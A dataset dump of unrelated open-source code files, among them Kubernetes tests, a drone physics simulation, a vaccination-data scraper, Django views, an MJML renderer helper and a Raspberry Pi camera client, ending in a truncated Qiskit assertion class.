autospec=True)\n@mock.patch(\"paasta_tools.instance.kubernetes.kubernetes_status\", autospec=True)\ndef test_instance_status_kubernetes_only(mock_kubernetes_status, mock_cr_status):\n kwargs = instance_status_kwargs()\n kwargs.update(instance_type=\"kubernetes\")\n pik.instance_status(**kwargs)\n assert len(mock_cr_status.mock_calls) == 0\n assert len(mock_kubernetes_status.mock_calls) == 1\n\n\n@mock.patch(\"paasta_tools.instance.kubernetes.cr_status\", autospec=True)\n@mock.patch(\"paasta_tools.instance.kubernetes.kubernetes_status\", autospec=True)\ndef test_instance_status_cr_only(mock_kubernetes_status, mock_cr_status):\n kwargs = instance_status_kwargs()\n kwargs.update(instance_type=\"flink\")\n pik.instance_status(**kwargs)\n assert len(mock_cr_status.mock_calls) == 1\n assert len(mock_kubernetes_status.mock_calls) == 0\n\n\n@mock.patch(\"paasta_tools.instance.kubernetes.cr_status\", autospec=True)\n@mock.patch(\"paasta_tools.instance.kubernetes.kubernetes_status\", autospec=True)\ndef test_instance_status_cr_and_kubernetes(mock_kubernetes_status, mock_cr_status):\n kwargs = instance_status_kwargs()\n kwargs.update(instance_type=\"cassandracluster\")\n pik.instance_status(**kwargs)\n assert len(mock_cr_status.mock_calls) == 1\n assert len(mock_kubernetes_status.mock_calls) == 1\n\n\n@mock.patch(\"paasta_tools.instance.kubernetes.job_status\", autospec=True)\n@mock.patch(\n \"paasta_tools.kubernetes_tools.replicasets_for_service_instance\", autospec=True\n)\n@mock.patch(\"paasta_tools.kubernetes_tools.pods_for_service_instance\", autospec=True)\n@mock.patch(\"paasta_tools.kubernetes_tools.get_kubernetes_app_by_name\", autospec=True)\n@mock.patch(\n \"paasta_tools.instance.kubernetes.LONG_RUNNING_INSTANCE_TYPE_HANDLERS\",\n autospec=True,\n)\ndef test_kubernetes_status(\n mock_LONG_RUNNING_INSTANCE_TYPE_HANDLERS,\n mock_get_kubernetes_app_by_name,\n mock_pods_for_service_instance,\n mock_replicasets_for_service_instance,\n mock_job_status,\n):\n mock_LONG_RUNNING_INSTANCE_TYPE_HANDLERS[\"flink\"] = mock.Mock()\n mock_pods_for_service_instance.return_value = []\n mock_replicasets_for_service_instance.return_value = []\n status = pik.kubernetes_status(\n service=\"\",\n instance=\"\",\n verbose=0,\n include_smartstack=False,\n instance_type=\"flink\",\n settings=mock.Mock(),\n )\n assert \"app_count\" in status\n assert \"evicted_count\" in status\n assert \"bounce_method\" in status\n assert \"desired_state\" in status\n\n\ndef test_cr_status_bad_instance_type():\n with pytest.raises(RuntimeError) as excinfo:\n pik.cr_status(\n service=\"\",\n instance=\"\",\n verbose=0,\n instance_type=\"marathon\",\n kube_client=mock.Mock(),\n )\n assert \"Unknown instance type\" in str(excinfo.value)\n\n\n@mock.patch(\"paasta_tools.kubernetes_tools.get_cr\", autospec=True)\ndef test_cr_status_happy_path(mock_get_cr):\n mock_status = mock.Mock()\n mock_metadata = mock.Mock()\n mock_return = dict(status=mock_status, metadata=mock_metadata)\n mock_get_cr.return_value = mock_return\n status = pik.cr_status(\n service=\"\",\n instance=\"\",\n verbose=0,\n instance_type=\"flink\",\n kube_client=mock.Mock(),\n )\n assert status == mock_return\n\n\ndef test_set_cr_desired_state_invalid_instance_type():\n with pytest.raises(RuntimeError) as excinfo:\n pik.set_cr_desired_state(\n kube_client=mock.Mock(),\n service=mock.Mock(),\n instance=mock.Mock(),\n instance_type=\"marathon\",\n desired_state=mock.Mock(),\n )\n assert \"Unknown instance type\" in str(excinfo.value)\n\n\n@mock.patch(\"paasta_tools.kubernetes_tools.set_cr_desired_state\", autospec=True)\ndef test_set_cr_desired_state_calls_k8s_tools(mock_set_cr_desired_state):\n pik.set_cr_desired_state(\n kube_client=mock.Mock(),\n service=mock.Mock(),\n instance=mock.Mock(),\n instance_type=\"flink\",\n desired_state=mock.Mock(),\n )\n assert len(mock_set_cr_desired_state.mock_calls) == 1\n\n\ndef test_can_set_state():\n for it in pik.INSTANCE_TYPES_WITH_SET_STATE:\n assert pik.can_set_state(it)\n\n assert not pik.can_set_state(\"marathon\")\n\n\ndef test_can_handle():\n for it in pik.INSTANCE_TYPES:\n assert pik.can_handle(it)\n\n assert not pik.can_handle(\"marathon\")\n","sub_path":"tests/instance/test_kubernetes.py","file_name":"test_kubernetes.py","file_ext":"py","file_size_in_byte":6082,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"450171159","text":"''' Utility methods which don't belong elsewhere.\n'''\nimport logging\nimport sys\nimport traceback\n\ndef get_required_bot_permissions_value():\n ''' Get a permissions value as an integer that can be inserted in a Discord URL to\n invite a bot to a guild.\n '''\n permissions = (\n (1 << 10) # 0x00000400 READ_MESSAGES\n + (1 << 11) # 0x00000800 SEND_MESSAGES\n + (1 << 14) # 0x00004000 EMBED_LINKS\n + (1 << 18) # 0x00020000 MENTION_EVERYONE\n + (1 << 19) # 0x00040000 USE_EXTERNAL_EMOJIS\n + (1 << 28) # 0x10000000 MANAGE_ROLES\n )\n return permissions\n\ndef get_invite_link(client_id):\n perm_value = get_required_bot_permissions_value()\n return 'https://discordapp.com/oauth2/authorize?&client_id=%s&scope=bot&permissions=%s' % (\n client_id, perm_value)\n\ndef log_traceback(logger):\n trace = traceback.extract_tb(sys.exc_info()[2])\n logger.error('Traceback: ')\n # Lines are four part tuples (file, linenum, funcname, text)\n for line in trace:\n logger.error('%s %d %s ', line[0], line[1], line[2])\n logger.error(' %s', line[3])\n","sub_path":"discord-bot/utils/misc.py","file_name":"misc.py","file_ext":"py","file_size_in_byte":1124,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"52203415","text":"import numpy as np \nimport math\nimport matplotlib.pyplot as plt\nimport matplotlib.pylab as pylab\n\n\nclass Drone2D:\n def __init__(self, \n k_f = 0.1, # value of the thrust coefficient\n I_x = 0.1, # moment of inertia around the x-axis\n m = 1.0, # mass of the vehicle \n l = 0.5, # distance between the center of mass and the propeller axis\n \n ):\n \n self.k_f = k_f\n self.I_x = I_x\n self.l = l\n self.m = m\n self.omega_1 = 0.0\n self.omega_2 = 0.0\n self.g = 9.81\n \n #State variables. z, y, phi, z_dot, y_dot, phi_dot\n self.X = np.array([0.0, 0.0, 0.0, 0.0, 0.0, 0.0])\n \n \n \n def get_thrust_and_moment(self):\n ''' Helper function which calculates and returns the collective thrust and moment about the X axis '''\n f_1 = self.k_f * self.omega_1 ** 2\n f_2 = self.k_f * self.omega_2 ** 2\n \n # c is often used to indicate \"collectice thrust\" \n c = f_1 + f_2\n M_x = (f_1 - f_2) * self.l\n return c, M_x \n \n @property\n def z_dot_dot(self): #5\n '''Calculates vertical(z) acceleration of drone.'''\n c, M_x = self.get_thrust_and_moment()\n \n phi = self.X[2] #getting phi(horizental rotation) from global state vector\n #Formula for vertical accn\n a_z = self.g - c * math.cos(phi) / self.m\n return a_z\n \n @property\n def y_dot_dot(self): #6\n ''' Calculates lateral(y) acceleration of drone'''\n c, M_x = self.get_thrust_and_moment()\n \n phi = self.X[2] #getting phi(horizental rotation) from global state vector\n # print(phi)\n #Formula for lateral accn\n a_y = c * math.sin(phi) / self.m\n return a_y\n \n @property\n def phi_dot_dot(self): #7\n c, M_x = self.get_thrust_and_moment()\n \n #Formula for angular horigental accn\n angular_acc = M_x / self.I_x\n return angular_acc\n \n \n # Advance state calculations\n def advance_state(self, dt): #4\n '''Advances the state of the drone forward by dt seconds.'''\n X_dot = np.array([\n self.X[3],\n self.X[4],\n self.X[5],\n self.z_dot_dot, #5\n self.y_dot_dot, #6\n self.phi_dot_dot #7\n ])\n \n # Change in state will be\n delta_x = X_dot * dt\n self.X = self.X + delta_x\n # print(self.X)\n return self.X\n \n '''\n This is compact and effective approach\n current_state = [z, z_dot] (position, velocity)\n updated_state = [z_dot, z_dot_dot] (velocity, accn) Here velocity z_dot take from current global velocity and accn is taken from calculation of accn of drone at that instant\n \n As per theory, \n we can get the position(Changed at that instant) by integrating velocity w.r.t dt(At that instant) delta_z = z_dot * dt\n Update_Current_Position current.z = current.z + delta_z\n \n we can get the velocity(Changed at that instant) by integrating accn w.r.t dt(At that instant) delta_z_dot = z_dot_dot * dt\n Update_Current_velocity current.z_dot = current.z_dot + delta_z_dot\n \n We can represt this in below form\n [z, z_dot] = [z, z_dot] + [delta_z_dot, delta_z_dot_dot] * dt\n \n self.X = [z, z_dot], \n X_dot = [z_dot, z_dot_dot], \n delta_x = X_dot * dt \n \n self.X(Updated_current_state) = self.X(Updated_current_state) + delta_x (Changed state at that instant) \n '''\n \n \n def set_rotors_angular_velocities(self,linear_acc):\n \"\"\"\n Objective: Need to track desired linner_accn without considering horizental angle(phi)[This horigental angle directly given inside decomposition thrust w.r.t bodyFrame]\n Sets self.omega_1 and self.omega_2 to realize the desired linear_acc. (Means w1^2 and w2^2 combinely need to achieve linear accn)\n Note that this is for vertical motion ONLY(So there is no need to varry w^2 values of rotor to perform pitching or rotational acceleration, so w^2 + w^2 = 2w^2 ). \n It is assumed that rotational acceleration and phi is zero. (Because here just tracking lin accn, rotation of bodyFrame/horizental_rotaion(phi) can already directly integrated with decomposing thrusts)\n \n Deriving omega,\n F = kf * w^2\n w^2 = F/kf\n F = m*a\n Fnet = Fdown - Fup\n = m * g - m * linner_accn\n F = m(g - linner_accn)\n \n Therefore w^2 = m(g - linner_accn)/kf\n Considering 2 motors tracking vertical motion without any difference in motors speed, w1^2 = w2^2 and w^2 = w1^2 + w2^2 = 2w^2 \n Finally w = sqrt(m(g - linner_accn)/2*kf)\n \"\"\"\n \n omega = math.sqrt(self.m * (-linear_acc + self.g) /(2 * self.k_f))\n\n self.omega_1 = omega\n self.omega_2 = omega\n\n return self.omega_1, self.omega_2 #2\n \n \n#Testing advance_state and set_rotors\n# Start by generating a target trajectory and target vertical acceleration\ntotal_time = 3.0\ndt = 0.002\nt = np.linspace(0.0, total_time, int(total_time/dt))\n\nz_path= 0.5*np.cos(2*t)-0.5 # Trajectory path below one is target accn to track this trajectory\nz_dot_dot_path= -2.0*np.cos(2*t) # Based on this target vertical accn, motor generates the omega and state variables updates drone position using advanceState()\n\n\n# Try to follow the trajectory. \n# Store the state history as we go.\n\ndrone = Drone2D()\ndrone_state_history = drone.X\nfor i in range(t.shape[0]-1):\n \n # setting the propeller velocities \n drone.set_rotors_angular_velocities(z_dot_dot_path[i]) #1\n \n # calculating the new state vector \n drone_state = drone.advance_state(dt) #3\n \n # generate a history of vertical positions for drone and arrange using vstack\n drone_state_history = np.vstack((drone_state_history, drone_state)) #8\n \n \n\n#Ploting\nplt.plot(t,z_path,linestyle='-',marker='o',color='red')\nplt.plot(t,drone_state_history[:,0],linestyle='-',color='blue')\nplt.grid()\nplt.title('Change in height').set_fontsize(20)\nplt.xlabel('$t$ [sec]').set_fontsize(20)\nplt.ylabel('$z-z_0$ [$m$]').set_fontsize(20)\nplt.xticks(fontsize = 14)\nplt.yticks(fontsize = 14)\nplt.legend(['planned path','executed path'],fontsize = 18)\nplt.show()","sub_path":"P3 - Controls/scripts/controllingDrone_2D.py","file_name":"controllingDrone_2D.py","file_ext":"py","file_size_in_byte":6743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"47303417","text":"from typing import (\n TYPE_CHECKING,\n Any,\n Dict,\n Optional,\n Sequence,\n Union,\n)\n\nfrom web3.exceptions import (\n ValidationError,\n)\n\nif TYPE_CHECKING:\n from web3 import Web3 # noqa: F401\n from web3.module import Module # noqa: F401\n\n\ndef attach_modules(\n parent_module: Union[\"Web3\", \"Module\"],\n module_definitions: Dict[str, Sequence[Any]],\n w3: Optional[Union[\"Web3\", \"Module\"]] = None\n) -> None:\n for module_name, module_info in module_definitions.items():\n module_class = module_info[0]\n\n if hasattr(parent_module, module_name):\n raise AttributeError(\n f\"Cannot set {parent_module} module named '{module_name}'. The web3 object \"\n \"already has an attribute with that name\"\n )\n\n if w3 is None:\n setattr(parent_module, module_name, module_class(parent_module))\n w3 = parent_module\n else:\n setattr(parent_module, module_name, module_class(w3))\n\n if len(module_info) == 2:\n submodule_definitions = module_info[1]\n module = getattr(parent_module, module_name)\n attach_modules(module, submodule_definitions, w3)\n elif len(module_info) != 1:\n raise ValidationError(\"Module definitions can only have 1 or 2 elements.\")\n","sub_path":"env/lib/python3.8/site-packages/web3/_utils/module.py","file_name":"module.py","file_ext":"py","file_size_in_byte":1329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"62003381","text":"import json\nimport requests\nimport vaxutils\nimport pandas as pd\n\nfirstDose_source = \"https://services-eu1.arcgis.com/z6bHNio59iTqqSUY/arcgis/rest/services/Covid19_Vaccine_Administration_Hosted_View/FeatureServer/0/query?f=json&where=1%3D1&outFields=*&returnGeometry=false&outStatistics=%5B%7B%22onStatisticField%22%3A%22firstDose%22%2C%22outStatisticFieldName%22%3A%22firstDose_max%22%2C%22statisticType%22%3A%22max%22%7D%5D\"\nsecondDose_source = \"https://services-eu1.arcgis.com/z6bHNio59iTqqSUY/arcgis/rest/services/Covid19_Vaccine_Administration_Hosted_View/FeatureServer/0/query?f=json&where=1%3D1&outFields=*&returnGeometry=false&outStatistics=%5B%7B%22onStatisticField%22%3A%22secondDose%22%2C%22outStatisticFieldName%22%3A%22secondDose_max%22%2C%22statisticType%22%3A%22max%22%7D%5D\"\ndate_source = \"https://services-eu1.arcgis.com/z6bHNio59iTqqSUY/arcgis/rest/services/Covid19_Vaccine_Administration_Hosted_View/FeatureServer/0/query?f=json&where=1%3D1&outFields=*&returnGeometry=false&outStatistics=%5B%7B%22onStatisticField%22%3A%22relDate%22%2C%22outStatisticFieldName%22%3A%22relDate_max%22%2C%22statisticType%22%3A%22max%22%7D%5D\"\n\n\ndef read() -> pd.Series:\n return parse_data()\n\n\ndef parse_data() -> pd.Series:\n keys = (\"date\", \"people_vaccinated\", \"people_fully_vaccinated\")\n values = (parse_date(), parse_people_vaccinated(), parse_people_fully_vaccinated())\n data = dict(zip(keys, values))\n return pd.Series(data=data)\n\n\ndef parse_date() -> str:\n data = json.loads(requests.get(date_source).content)[\"features\"][0][\"attributes\"]\n date = data[\"relDate_max\"]\n date = str(pd.to_datetime(date, unit=\"ms\").date())\n return date\n\n\ndef parse_people_vaccinated() -> int:\n data = json.loads(requests.get(firstDose_source).content)[\"features\"][0][\"attributes\"]\n people_vaccinated = int(data[\"firstDose_max\"])\n return people_vaccinated\n\n\ndef parse_people_fully_vaccinated() -> int:\n data = json.loads(requests.get(secondDose_source).content)[\"features\"][0][\"attributes\"]\n people_fully_vaccinated = int(data[\"secondDose_max\"])\n return people_fully_vaccinated\n\n\ndef add_totals(input: pd.Series) -> pd.Series:\n total_vaccinations = input['people_vaccinated'] + input['people_fully_vaccinated']\n return vaxutils.enrich_data(input, 'total_vaccinations', total_vaccinations)\n\n\ndef enrich_location(input: pd.Series) -> pd.Series:\n return vaxutils.enrich_data(input, 'location', \"Ireland\")\n\n\ndef enrich_vaccine(input: pd.Series) -> pd.Series:\n return vaxutils.enrich_data(input, 'vaccine', \"Moderna, Oxford/AstraZeneca, Pfizer/BioNTech\")\n\n\ndef enrich_source(input: pd.Series) -> pd.Series:\n return vaxutils.enrich_data(input, 'source_url', \"https://covid19ireland-geohive.hub.arcgis.com/\")\n\n\ndef pipeline(input: pd.Series) -> pd.Series:\n return (\n input.pipe(add_totals)\n .pipe(enrich_location)\n .pipe(enrich_vaccine)\n .pipe(enrich_source)\n )\n\n\ndef main():\n data = read().pipe(pipeline)\n vaxutils.increment(\n location=data['location'],\n total_vaccinations=data['total_vaccinations'],\n people_vaccinated=data['people_vaccinated'],\n people_fully_vaccinated=data['people_fully_vaccinated'],\n date=data['date'],\n source_url=data['source_url'],\n vaccine=data['vaccine']\n )\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"scripts/scripts/vaccinations/automations/incremental/ireland.py","file_name":"ireland.py","file_ext":"py","file_size_in_byte":3367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"157597494","text":"class Solution:\r\n def intToRoman(self, num):\r\n \"\"\"\r\n 整数转罗马数字\r\n :param num: 给定整数\r\n :return: 罗马数字字符串\r\n \"\"\"\r\n # num在1-3999内\r\n if num < 1 or num > 3999:\r\n return None\r\n\r\n nums_map = {1000: \"M\", 900: \"CM\", 500: \"D\", 400: \"CD\", 100: \"C\", 90: \"XC\", 50: \"L\", 40: \"XL\", 10: \"X\", 9: \"IX\",\r\n 5: \"V\", 4: \"IV\", 1: \"I\"}\r\n\r\n answer = \"\"\r\n\r\n for k, v in nums_map.items():\r\n count = num // k\r\n num %= k\r\n for i in range(0, count):\r\n answer += v\r\n\r\n return answer\r\n\r\n\r\nif __name__ == \"__main__\":\r\n print(Solution().intToRoman(2220))\r\n","sub_path":"LeetCode_Python/Test_12_intToRoman.py","file_name":"Test_12_intToRoman.py","file_ext":"py","file_size_in_byte":717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"490284036","text":"import os\nimport re\n\nfrom django.core.files.base import ContentFile\nfrom django.core.files.storage import default_storage\nfrom markdown2 import Markdown\n\n\ndef list_entries():\n \"\"\"\n Returns a list of all names of encyclopedia entries.\n \"\"\"\n _, filenames = default_storage.listdir(\"entries\")\n return list(sorted(re.sub(r\"\\.md$\", \"\", filename)\n for filename in filenames if filename.endswith(\".md\")))\n\n\ndef edit_entry(title, content):\n \"\"\"\n Edit the contents of an entry.\n \"\"\"\n with open(f\"entries/{title}.md\", \"w\") as f:\n f.write(content)\n\n\ndef get_entry(title):\n \"\"\"\n Retrieves an encyclopedia entry by its title. If no such\n entry exists, the function returns None.\n \"\"\"\n try:\n f = default_storage.open(f\"entries/{title}.md\")\n return f.read().decode(\"utf-8\")\n except FileNotFoundError:\n return None\n\n\ndef convert_md(mdFile):\n \"\"\" \n Read contents of Markdown file and return HTML. \n \"\"\"\n with open(f\"./entries/{mdFile}.md\") as f:\n contents = f.read()\n markdowner = Markdown()\n ourHtml = markdowner.convert(contents)\n return ourHtml\n\n\ndef get_title(mdFile):\n base = os.path.basename(f\"./entries/{mdFile}.md\")\n title = os.path.splitext(base)[0]\n return title\n\n\ndef read_contents(mdFile):\n \"\"\" \n Return the contents of a Markdown file. \n \"\"\"\n with open(f\"./entries/{mdFile}.md\") as f:\n contents = f.read()\n return contents\n\n\ndef create_entry(title, content):\n \"\"\"\n Allow creation of an entry. If page already exists,\n return an error.\n \"\"\"\n filename = f\"entries/{title}.md\"\n if default_storage.exists(filename):\n return False\n else:\n default_storage.save(filename, ContentFile(content))\n return True\n","sub_path":"encyclopedia/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":1785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"390354883","text":"# -*- coding: utf-8 -*-\n# Part of Odoo. See LICENSE file for full copyright and licensing details.\n\nimport logging\n\nfrom openerp import api, fields, models, _\nfrom openerp.exceptions import UserError, ValidationError\n\n_logger = logging.getLogger(__name__)\n\n\nclass Partner(models.Model):\n _inherit = 'res.partner'\n\n ''' Add field district in partner\n '''\n\n district_id = fields.Many2one('res.country.district',\n string='District')\n\n def _display_address(self, cr, uid, address, without_company=False, context=None):\n # Adding district and change address format\n address_format = address.country_id.address_format or \\\n \"%(street)s\\n%(street2)s\\n%(city)s %(state_code)s %(zip)s\\n%(district_name)s\\n%(country_name)s\"\n args = {\n 'state_code': address.state_id.code or '',\n 'state_name': address.state_id.name or '',\n 'district_code': address.district_id.code or '',\n 'district_name': address.district_id.name or '',\n 'country_code': address.country_id.code or '',\n 'country_name': address.country_id.name or '',\n 'company_name': address.parent_name or '',\n }\n for field in self._address_fields(cr, uid, context=context):\n args[field] = getattr(address, field) or ''\n if without_company:\n args['company_name'] = ''\n elif address.parent_id:\n address_format = '%(company_name)s\\n' + address_format\n return address_format % args\n","sub_path":"fal_delivery_with_district/models/res_partner.py","file_name":"res_partner.py","file_ext":"py","file_size_in_byte":1548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"120550890","text":"from django.shortcuts import render\nfrom .models import Gallery\nfrom .models import Courses\nfrom .models import Teachers\nfrom django.core.mail import send_mail\n# Create your views here.\ndef home(request):\n gal=Gallery.objects.all()\n return render(request,'index.html')\n\ndef about(request):\n return render(request,'about.html')\n\ndef course(request):\n cou=Courses.objects.all()\n teach=Teachers.objects.all()\n return render(request,'course.html',{'cou':cou,'teach':teach})\n\ndef gallery(request):\n gal=Gallery.objects.all()\n\n return render(request,'gallery.html',{'gal':gal})\n\ndef contact(request):\n if request.method=='POST':\n name=request.POST.get('yourName')\n\n phone_no=str(request.POST.get('phone'))\n email_id=request.POST.get('email')\n course=request.POST.get('subject')\n Message=request.POST.get('Message')\n\n send_mail(\n phone_no,\n course,\n Message,\n ['rv432222@gmail.com'],\n fail_silently=False,\n )\n # print(name+phone_no+email_id+course+Message)\n return render(request,'contact.html')\n","sub_path":"home/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1130,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"1368211","text":"import socket\nimport random\nimport subprocess\nfrom django.utils.encoding import force_str\nfrom . import settings as mjml_settings\n\n\ndef _mjml_render_by_cmd(mjml_code):\n cmd_args = mjml_settings.MJML_EXEC_CMD\n if not isinstance(cmd_args, list):\n cmd_args = [cmd_args]\n cmd_args.extend(['-i', '-s'])\n\n try:\n p = subprocess.Popen(cmd_args, stdin=subprocess.PIPE, stdout=subprocess.PIPE)\n html = force_str(p.communicate(mjml_code.encode('utf8'))[0])\n except (IOError, OSError) as e:\n raise RuntimeError(\n 'Problem to run command \"{}\"\\n'.format(' '.join(cmd_args)) +\n '{}\\n'.format(e) +\n 'Check that mjml is installed and allow permissions for execute.\\n' +\n 'See https://github.com/mjmlio/mjml#installation'\n )\n return html\n\n\ndef _mjml_render_by_tcpserver(mjml_code):\n if len(mjml_settings.MJML_TCPSERVERS) > 1:\n servers = list(mjml_settings.MJML_TCPSERVERS)[:]\n random.shuffle(servers)\n else:\n servers = mjml_settings.MJML_TCPSERVERS\n\n mjml_code = mjml_code.encode('utf8') or ' '\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n for host, port in servers:\n try:\n s.connect((host, port))\n except socket.error:\n continue\n try:\n s.send(mjml_code)\n ok = force_str(s.recv(1)) == '0'\n result_len = int(force_str(s.recv(9)))\n result = force_str(s.recv(result_len))\n if ok:\n return result\n else:\n raise RuntimeError('MJML compile error (via MJML TCP server): {}'.format(result))\n finally:\n s.close()\n raise RuntimeError('MJML compile error (via MJML TCP server): no working server')\n\n\ndef mjml_render(mjml_code):\n if mjml_code is '':\n return mjml_code\n\n if mjml_settings.MJML_BACKEND_MODE == 'cmd':\n return _mjml_render_by_cmd(mjml_code)\n elif mjml_settings.MJML_BACKEND_MODE == 'tcpserver':\n return _mjml_render_by_tcpserver(mjml_code)\n raise RuntimeError('Invalid settings.MJML_BACKEND_MODE \"{}\"'.format(mjml_settings.MJML_BACKEND_MODE))\n","sub_path":"mjml/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":2166,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"239417896","text":"# 1. Проанализировать скорость и сложность одного любого алгоритма из разработанных в\n# рамках домашнего задания первых трех уроков.\n\n\n# Задача:\n# 5. В массиве найти максимальный отрицательный элемент.\n# Вывести на экран его значение и позицию в массиве.\nimport random\nimport timeit\n\n# Первый вариант реализации функции\n# __________________________________\n\ndef find_max_neg_fst(array):\n neg_array = []\n for i in array:\n if i < 0:\n neg_array.append(i)\n\n max_neg = neg_array[0]\n for i in neg_array:\n if i < max_neg:\n max_neg = i\n\n max_neg_idx = neg_array.index(max_neg)\n return max_neg, max_neg_idx\n\n# Второй вариант реализации функции\n# __________________________________\n\ndef find_max_neg_snd(array):\n max_neg = array[0]\n for i in array:\n if i < max_neg and i < 0:\n max_neg = i\n\n max_neg_idx = array.index(max_neg)\n return max_neg, max_neg_idx\n\n# Третий вариант реализации функции\n# __________________________________\n\ndef find_max_neg_trd(array):\n neg_array = []\n for i in array:\n if i < 0:\n neg_array.append(i)\n max_neg = max(neg_array)\n max_neg_idx = array.index(max_neg)\n return max_neg, max_neg_idx\n\n# Срвнение различных реализаций функции\n\nNUMBER_EXECUTIONS = 1\narray = [random.randint(-100, 100) for i in range(20)]\ntime1 = timeit.timeit(f'find_max_neg_fst({array})',\n setup='from __main__ import find_max_neg_fst',\n number=NUMBER_EXECUTIONS)\ntime2 = timeit.timeit(f'find_max_neg_snd({array})',\n setup='from __main__ import find_max_neg_snd',\n number=NUMBER_EXECUTIONS)\ntime3 = timeit.timeit(f'find_max_neg_trd({array})',\n setup='from __main__ import find_max_neg_trd',\n number=NUMBER_EXECUTIONS)\n\nprint(f'Вторая реализация функции быстрее первой в {round(time2 / time1, 2)} раза')\nprint(f'Третья реализация функции быстрее второй в {round(time3 / time2, 2)} раза')\n\n# Вторая реализация функции быстрее первой в 0.53 раза\n# Третья реализация функции быстрее второй в 1.56 раза","sub_path":"lesson4/task1.py","file_name":"task1.py","file_ext":"py","file_size_in_byte":2616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"300480375","text":"f = open(\"8.txt\",\"r\")\nlista = f.read()\nf.close()\nw = 25\nh = 6\nlayers = []\nzeri = []\nuni = []\ndue = []\nfor i in range(0, len(lista), w*h):\n layers.append(lista[i:i+w*h])\nfor layer in layers:\n temp = 0\n asd = 0\n coso = 0\n for j in range(w*h):\n if int(layer[j]) == 0:\n temp += 1\n if int(layer[j]) == 1:\n asd += 1\n if int(layer[j]) == 2:\n coso += 1\n zeri.append(temp)\n uni.append(asd)\n due.append(coso)\nminimo = 0\nfor i in range(len(zeri)):\n if zeri[i] < zeri[minimo]:\n minimo = i\nprint(\"solution 1:\", uni[minimo] * due[minimo])\nfinal = []\nfor i in range(len(layers[0])):\n pixel = int(layers[0][i]) #2 trasparente, 1 bianco, 0 nero\n profondita = 0\n while pixel == 2:\n profondita += 1\n pixel = int(layers[profondita][i])\n final.append(pixel)\nprint(\"solution 2:\")\nuni[0] = 0\ndue[0] = 0\nfor i in range(h):\n for j in range(i*w, i*w + w):\n print(final[j], end=\"\")\n print()\n","sub_path":"8/8.py","file_name":"8.py","file_ext":"py","file_size_in_byte":991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"411611906","text":"# -*- coding: utf-8 -*-\n\n#client part to access raspberry pi cameras in remote LAN\n#use this API from web server app\n\nimport xmlrpclib\nimport os, sys\nimport errno\n\n#settings shared with django app cams\n#make separate settings if you use this with non-django app\nfrom cams.cam_settings import *\n\nimport logging\nlogger = logging.getLogger(__name__)\n\n\nclass PiManagerError(Exception):\n def __init__(self, *args):\n self.args = args\n\n def __repr__(self):\n return \"PiManagerError \" + self.args\n\n def __str__(self):\n return ' '.join(self.args)\n\n\nclass PiProxy():\n def __init__(self):\n self.proxy = xmlrpclib.ServerProxy(\"http://localhost:2001/\")\n\n def take_picture(self, pi, size = ('512', '512'), use_old=False, archive=False):\n pict = os.path.join(IMAGE_ROOT, \"pict_\" + pi + \".jpg\")\n try:\n if not settings.DEBUG:\n os.makedirs(IMAGE_ROOT)\n except OSError as exception:\n if exception.errno != errno.EEXIST:\n logger.error('dir creation failed, dir: %s' % dir)\n return False\n logger.debug('in take picture: %s' % pict)\n\n self.proxy.take_picture(pi, size[0], size[1], pict, use_old, archive)\n data = \"\"\n try:\n with open(pict, 'rb') as f:\n #return _read_in_chunks(f)\n return f.read()\n except IOError:\n logger.error('Failed to open image file %s' % pict)\n return \"\"\n\n def reset_video_timer(self, pi):\n self.proxy.reset_video_timer(pi)\n\n def start_hls_video(self, pi, h='405', w='720'):\n dir = os.path.join(IMAGE_ROOT, pi)\n logger.debug('dir is: %s' % dir)\n try:\n os.makedirs(dir)\n except OSError as exception:\n if exception.errno != errno.EEXIST:\n logger.error('dir creation failed, dir: %s' % dir)\n return False\n return self.proxy.start_hls_video(pi, h, w, dir)\n","sub_path":"piclient.py","file_name":"piclient.py","file_ext":"py","file_size_in_byte":1980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"362316563","text":"# -*- coding: utf-8 -*-\n\n# This code is part of Qiskit.\n#\n# (C) Copyright IBM 2019.\n#\n# This code is licensed under the Apache License, Version 2.0. You may\n# obtain a copy of this license in the LICENSE.txt file in the root directory\n# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.\n#\n# Any modifications or derivative works of this code must retain this\n# copyright notice, and modified files need to carry a notice indicating\n# that they have been altered from the originals.\n\n\"\"\"\nAssertion of product states.\n\"\"\"\nimport numpy as np\nfrom scipy.stats import chi2_contingency\nfrom qiskit.assertions.asserts import Asserts\nfrom qiskit.circuit.quantumcircuit import QuantumCircuit\nfrom qiskit.circuit.quantumcircuit import Register\n\n\nclass AssertProduct(Asserts):\n \"\"\"\n A measurement instruction that additionally performs statistical tests on the measurement\n outcomes to assert whether the state is a product state or not.\n \"\"\"\n def __init__(self, qubit0, cbit0, qubit1, cbit1, pcrit, negate):\n \"\"\"\n Constructor for AssertProduct\n\n Args:\n qubit0(QuantumRegister or list): quantum register\n cbit0(ClassicalRegister or list): classical register\n qubit1(QuantumRegister or list): quantum register\n cbit1(ClassicalRegister or list): classical register\n pcrit(float): the critical p-value\n negate(bool): True if assertion passed is negation of statistical test passed\n 